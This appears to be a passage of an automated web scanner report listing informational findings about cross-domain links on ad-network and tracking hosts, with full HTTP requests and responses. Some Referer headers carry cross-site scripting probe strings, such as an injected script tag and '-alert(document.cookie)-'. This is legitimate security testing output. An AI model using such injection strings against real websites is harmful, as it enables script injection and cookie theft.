Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: O15607=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT
Content-type: text/html
Content-length: 1347
Connection: close


<iframe src="http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=ba80c6d3ee7a3c8edb827d9db39ffcd685104621&_o=15607&_eo=747979&_et=1307963580&_a=18121040&_s=0&_d=18123636&_pm=747979&_pn=18126789&redirect=;u=18126789;ord=7668881?" width="728" height="90" marginwidth="0" marginheight="0" frameborder="0" scrolling="no">
<script language="JavaScript" src="http://ad.doubleclick.net/adj/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=ba80c6d3ee7a3c8edb827d9db39ffcd685104621&_o=15607&_eo=747979&_et=1307963580&_a=18121040&_s=0&_d=18123636&_pm=747979&_pn=18126789&redirect=;u=18126789;ord=7668881?" type="text/javascript"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=ba80c6d3ee7a3c8edb827d9db39ffcd685104621&_o=15607&_eo=747979&_et=1307963580&_a=18121040&_s=0&_d=18123636&_pm=747979&_pn=18126789&redirect=;u=18126789;ord=7668881?" target="_blank"><img src="http://ad.doubleclick.net/ad/x1.rtb/fingerhut/mass/rmkt;sz=728x90;ord=7668881?" width="728" height="90" border="0" alt=""></a></noscript>
<iframe src="http://ad.doubleclick.net/adi/x1.dt/dt2;sz=1x1;ord=1234443?" width="0" frameborder="0" height="0" scrolling="no"></iframe>
...[SNIP]...

18.98. http://bp.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bp.specificclick.net
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://bp.specificclick.net/?pixid=99002135

The response contains the following link to another domain:

http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1

Request

GET /?pixid=99002135 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1498390;type=mtvre912;cat=remot936;ord=4072029369417.578?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7qHV^0^3; smdmp=7qEy:811200901^7qEy:1; adf=7qHV^0^0; ug=FiMiv7kDK4v9CD

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 255
Date: Mon, 13 Jun 2011 11:18:19 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1">here</a>
...[SNIP]...

18.99. http://bpx.a9.com/ads/getad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bpx.a9.com
Path:	/ads/getad

Issue detail

The page was loaded from a URL containing a query string:

http://bpx.a9.com/ads/getad?p=461&v=1&r=254578

The response contains the following link to another domain:

http://afe.specificclick.net/?l=844620&sz=728x90&wr=h&t=h

Request

GET /ads/getad?p=461&v=1&r=254578 HTTP/1.1
Host: bpx.a9.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bpx_ustats="IhRhDcnYghU7pyAAbsxd5XOwPlefXNwx/nZTGCcg9tU="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Set-Cookie: bpx_ustats="IhRhDcnYghU7pyAAbsxd5XOwPlefXNwx+8atGVmzGw+514XNc0jmUDBQs8XsWBdxG2jx4E5g02w="; Version=1; Max-Age=86400; Expires=Tue, 14-Jun-2011 11:25:45 GMT; Path=/
Content-Type: text/javascript
Content-Length: 268
Date: Mon, 13 Jun 2011 11:25:44 GMT

a9_render_ad({"s":"728x90","tr":false,"nid":22,"p":461,"n":"Specific Media","html":"<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=728 HEIGHT=90 src='http://afe.specificclick.net?l=844620&sz=728x90&wr=h&t=h'><\/IFRAME>
...[SNIP]...

18.100. http://bpx.a9.com/ads/render previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bpx.a9.com
Path:	/ads/render

Issue detail

The page was loaded from a URL containing a query string:

http://bpx.a9.com/ads/render?p=461&t=678&r=838036

The response contains the following link to another domain:

http://afe.specificclick.net/?l=844620&sz=728x90&wr=h&t=h

Request

GET /ads/render?p=461&t=678&r=838036 HTTP/1.1
Host: bpx.a9.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bpx_ustats="IhRhDcnYghU7pyAAbsxd5XOwPlefXNwxj18ImLznjwOzgr5QgO2uH28pH0LJquSV7BiZK4aJt10="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript
Content-Length: 268
Date: Mon, 13 Jun 2011 11:19:12 GMT

a9_render_ad({"s":"728x90","tr":false,"nid":22,"p":461,"n":"Specific Media","html":"<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=728 HEIGHT=90 src='http://afe.specificclick.net?l=844620&sz=728x90&wr=h&t=h'><\/IFRAME>
...[SNIP]...

18.101. http://cdn.extensions.buzznet.com/topscript.js.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.extensions.buzznet.com
Path:	/topscript.js.php

Issue detail

The page was loaded from a URL containing a query string:

http://cdn.extensions.buzznet.com/topscript.js.php?siteToken=ID

The response contains the following link to another domain:

http://ad.doubleclick.net/adi/';outputString+=buildDartScriptSrc(adConfig)+'

Request

GET /topscript.js.php?siteToken=ID HTTP/1.1
Host: cdn.extensions.buzznet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) PHP/5.3.5
X-Powered-By: PHP/5.3.5
Pragma: no-cache
Content-Type: text/javascript; charset=UTF-8
Cache-Control: public, max-age=0
Expires: Mon, 13 Jun 2011 11:32:57 GMT
Date: Mon, 13 Jun 2011 11:32:57 GMT
Content-Length: 133702
Connection: close

// bmQuery (jQuery) JavaScript Library 1.5.2
(function(s,n){function ka(a,b,d){if(d===n&&a.nodeType===1)if(d=a.getAttribute("data-"+b),typeof d==="string"){try{d=d==="true"?!0:d==="false"?!1:d==="null
...[SNIP]...
idth='';var height='';var positionName='';if(adConfig.sizes.length>0){var size=adConfig.sizes[0];var splitString=adConfig.sizes[0].split('x');width=splitString[0];height=splitString[1];}
outputString='<iframe src="http://ad.doubleclick.net/adi/';outputString+=buildDartScriptSrc(adConfig)+'"';outputString+=' name="'+id+'" id="'+id+'"';outputString+=' height="'+height+'" width="'+width+'"'
outputString+=' framespacing="0" frameborder="0" marginheight="0" marginwidth="0" scrolling="no">';if(navigator.userAgent.indexOf("Gecko")==-1){outputString+='<scri'+'pt type="text/javascript" src="http://ad.doubleclick.net/adj/';outputString+=buildDartScriptSrc(adConfig);outputString+='"><\/scr'+'ipt>
...[SNIP]...

18.102. http://cim.meebo.com/cim previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cim.meebo.com
Path:	/cim

Issue detail

The page was loaded from a URL containing a query string:

http://cim.meebo.com/cim?iv=5&network=fansided

The response contains the following links to other domains:

http://search.twitter.com/search?q=%23$1
http://twitter.com/$1

Request

GET /cim?iv=5&network=fansided HTTP/1.1
Host: cim.meebo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 13 Jun 2011 11:01:08 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
Cache-Control: public, max-age=14400, post-check=28800, pre-check=14400
ETag: 41814555
Vary: User-Agent, Accept-Language
Content-Length: 16941

// Firefox likes to mess with us and swap around / load the wrong contents in iframes.
// Reload the iframe using the src attribute if our code somehow gets swapped into an
// iframe that is not ours
...[SNIP]...
</a>");
a=a.replace(/#(\w+)/g,"<a style='color: rgb(138, 151, 230); text-decoration:none' target='_blank' href='http://search.twitter.com/search?q=%23$1'>#$1</a>");
a=a=a.replace(/@(\w+)/g,"<a style='color: rgb(138, 151, 230); text-decoration:none' target='_blank' href='http://twitter.com/$1'>@$1</a>
...[SNIP]...

18.103. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=appnexus1

The response contains the following link to another domain:

http://adx.adnxs.com/mapuid?member=181&user=CAESECFrKvBlT-cBj-xM8B2ECfY&cver=1

Request

GET /pixel?nid=appnexus1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://adx.adnxs.com/mapuid?member=181&user=CAESECFrKvBlT-cBj-xM8B2ECfY&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:12:59 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://adx.adnxs.com/mapuid?member=181&user=CAESECFrKvBlT-cBj-xM8B2ECfY&cver=1">here</A>
...[SNIP]...

18.104. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=c44786835&CriteoUserId=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4&rtbId=4

The response contains the following link to another domain:

http://dis.criteo.com/dis/rtb/google/cookiematch.aspx?id=CAESENL3FhH0Cubg_LnXWGGqWMs&cver=1&CriteoUserId=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4&rtbId=4

Request

GET /pixel?nid=c44786835&CriteoUserId=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4&rtbId=4 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=5360&cb=e2781b91d4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://dis.criteo.com/dis/rtb/google/cookiematch.aspx?id=CAESENL3FhH0Cubg_LnXWGGqWMs&cver=1&CriteoUserId=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4&rtbId=4
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:21:26 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 358
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://dis.criteo.com/dis/rtb/google/cookiematch.aspx?id=CAESENL3FhH0Cubg_LnXWGGqWMs&cver=1&CriteoUserId=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4&rtbId=4">here</A>
...[SNIP]...

18.105. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=B765081F39B1F7

The response contains the following link to another domain:

http://cms.quantserve.com/dpixel?eid=0&id=CAESEDgrJL3jXTrSvFzZE-NS2Ik&cver=1

Request

GET /pixel?nid=B765081F39B1F7 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://cms.quantserve.com/dpixel?eid=0&id=CAESEDgrJL3jXTrSvFzZE-NS2Ik&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:06:53 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 281
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://cms.quantserve.com/dpixel?eid=0&id=CAESEDgrJL3jXTrSvFzZE-NS2Ik&cver=1">here</A>
...[SNIP]...

18.106. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=turn1

The response contains the following link to another domain:

http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESEOOGEBTT9OtECB0SEmkPQV4&cver=1

Request

GET /pixel?nid=turn1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESEOOGEBTT9OtECB0SEmkPQV4&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:02:21 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESEOOGEBTT9OtECB0SEmkPQV4&cver=1">here</A>
...[SNIP]...

18.107. http://cm.npc-lee.overture.com/js_1_0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.npc-lee.overture.com
Path:	/js_1_0/

Issue detail

The page was loaded from a URL containing a query string:

http://cm.npc-lee.overture.com/js_1_0/?config=3514931570&type=sports&keywordCharEnc=utf8&source=npc_lee_southernillinoisian_t1_ctxt&adwd=300&adht=250&ctxtUrl=http%3A%2F%2Fwww.thesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&bg=FFFFFF&bc=FFFFFF&cc=FFFFFF&lc=254264&tc=333333&uc=999999&du=1&cb=1307962881243&ctxtContent=%3Chead%3E%0A%3Cbase%20href%3D%22http%3A%2F%2Fthesouthern.com%2Fcontent%2Ftncms%2Flive%2F%22%3E%0A%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%3E%0A%3Cmeta%20name%3D%22description%22%20content%3D%22%22%3E%0A%3Cmeta%20name%3D%22keywords%22%20content%3D%22%23ap%2C%22%3E%0A%0A%3Cmeta%20property%3D%22og%3Atitle%22%20content%3D%22Mavs%20show%20their%20depth%2C%20teamwork%20in%20title%20clincher%20%20%22%3E%0A%3Cmeta%20property%3D%22og%3Asite_name%22%20content%3D%22thesouthern.com%22%3E%0A%0A%0A%0A%3Cmeta%20property%3D%22og%3Aimage%22%20content%3D%22http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2Fc%2Fbd%2F011%2Fcbd0112

The response contains the following link to another domain:

http://info.yahoo.com/services/us/yahoo/ads/details.html

Request

Response

18.108. http://cms.ad.yieldmanager.net/v1/cms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cms.ad.yieldmanager.net
Path:	/v1/cms

Issue detail

The page was loaded from a URL containing a query string:

http://cms.ad.yieldmanager.net/v1/cms?esig=1~862d802dd86fb59368388ad078a7f298ddbbd0b7&nwid=10000424978&sigv=1

The response contains the following link to another domain:

http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=zW_MQLu_9f.zvSJx2mqLKWDG

Request

GET /v1/cms?esig=1~862d802dd86fb59368388ad078a7f298ddbbd0b7&nwid=10000424978&sigv=1 HTTP/1.1
Host: cms.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=163

Response

HTTP/1.1 302 Found
Date: Mon, 13 Jun 2011 11:12:27 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=zW_MQLu_9f.zvSJx2mqLKWDG
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 796

HTTP/1.1 302 Found
Date: Mon, 13 Jun 2011 11:12:27 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PU
...[SNIP]...
n.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=zW_MQLu_9f.zvSJx2mqLKWDG
Cache-Control: private
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

The document has moved <A HREF="http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=zW_MQLu_9f.zvSJx2mqLKWDG">here</A>
...[SNIP]...

18.109. http://creativeby1.unicast.com/assets/A322/N26843/M13937/P1944/Q72996/script_850_40.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creativeby1.unicast.com
Path:	/assets/A322/N26843/M13937/P1944/Q72996/script_850_40.js

Issue detail

The page was loaded from a URL containing a query string:

http://creativeby1.unicast.com/assets/A322/N26843/M13937/P1944/Q72996/script_850_40.js?0.21799533301964402

The response contains the following link to another domain:

http://ad.doubleclick.net/clk;241002212;63651464;o?http://us.havaianas.com/MYOH.html

Request

GET /assets/A322/N26843/M13937/P1944/Q72996/script_850_40.js?0.21799533301964402 HTTP/1.1
Host: creativeby1.unicast.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VWCUKG300=L0/Q69087_13220_65_061311_1_070111_426862x425702x061311x1x1/Q72066_13570_1832_052711_1_060511_441651x436658x052711x1x1/Q72053_13570_1832_052111_1_060511_441669x436656x052111x1x1; SVWCUKG300=426862_1

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:28:37 GMT
Server: lighttpd
Content-Type: text/javascript
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
ETag: "3820672426"
Last-Modified: Tue, 07 Jun 2011 23:45:16 GMT
P3P: policyref="/w3c/policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Age: 235
Cache-Control: max-age=1720
Via: HTTP/1.1 creativeby1.unicast.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Expires: Mon, 13 Jun 2011 11:57:16 GMT
Via: 1.1 rhv082178010000 (MII-APC/1.6)
Content-Length: 5951

   if(window.inDapIF||window.inFIF||window.inAOLFIF){VwFriendlyIframe=true;VwClosedDocument=true;}
   if(window.inFIF||window.inAOLFIF){VwClosedDocument=false;}
   if(window.inDapIF&&document.body&&document
...[SNIP]...
cript/V3.00/select"+(window.VwP72996D?"d":"")+".js";
   VwP72996PathToDeliver=VwP72996PathToSelect.replace("select","deliver");
   if(!window.VwPlacementsToSelect)VwPlacementsToSelect=[];
   VwP72996ImgTag="<a href='http://ad.doubleclick.net/clk;241002212;63651464;o?http://us.havaianas.com/MYOH.html' target='unicastTarget'><img src='http://creativeby1.unicast.com/assets/A322/N26843/M13937/C444949/hav_id_revised_bar_btn.jpg' width='850' height='40' border=0>
...[SNIP]...

18.110. http://dg.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dg.specificclick.net
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://dg.specificclick.net/?y=3&t=h&u=http%3A%2F%2Fsportdfw.com%2Faboutcontact-us%2F&r=http%3A%2F%2Fsportdfw.com%2F2011%2F06%2F13%2F10-observations-dallas-mavs-finals%2F

The response contains the following link to another domain:

http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1

Request

GET /?y=3&t=h&u=http%3A%2F%2Fsportdfw.com%2Faboutcontact-us%2F&r=http%3A%2F%2Fsportdfw.com%2F2011%2F06%2F13%2F10-observations-dallas-mavs-finals%2F HTTP/1.1
Host: dg.specificclick.net
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7qHV^0^3; smdmp=7qEy:811200901^7qEy:1; adf=7qHV^0^0; ug=FiMiv7kDK4v9CD; JSESSIONID=8b427d775a2d0d054b4244fa1880

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 13 Jun 2011 11:13:21 GMT
Vary: Accept-Encoding
Content-Length: 569
Connection: Keep-Alive

<html><body> <script> var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = docume
...[SNIP]...
<noscript> <img src="http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1" /> </noscript>
...[SNIP]...

18.111. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=2588797;type=nausc826;cat=nausi956;u=F398C033545B4D3D89FE3B1CF839F8D4;u1=Hotel;u4=20110714%7C20110718;u2=178293;u6=1;u7=2%7C0;u9=Millenium%20Hilton;u11=40;u13=892034;u14=215.2;u16=USD;ord=3659212116617.7095?

The response contains the following links to other domains:

http://a.cdn.intentmedia.net/javascripts/intent_media_expedia_beacon.js
http://tags.bluekai.com/site/2565?ret=html&phint=u1=Hotel&phint=u2=178293&phint=u4=20110714%7C20110718&phint=u6=1&phint=u7=2%7C0&phint=u9=Millenium%20Hilton&phint=u11=40&phint=u13=892034&phint=u14=215.2&phint=u15=

Request

GET /activityi;src=2588797;type=nausc826;cat=nausi956;u=F398C033545B4D3D89FE3B1CF839F8D4;u1=Hotel;u4=20110714%7C20110718;u2=178293;u6=1;u7=2%7C0;u9=Millenium%20Hilton;u11=40;u13=892034;u14=215.2;u16=USD;ord=3659212116617.7095? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 13 Jun 2011 11:21:51 GMT
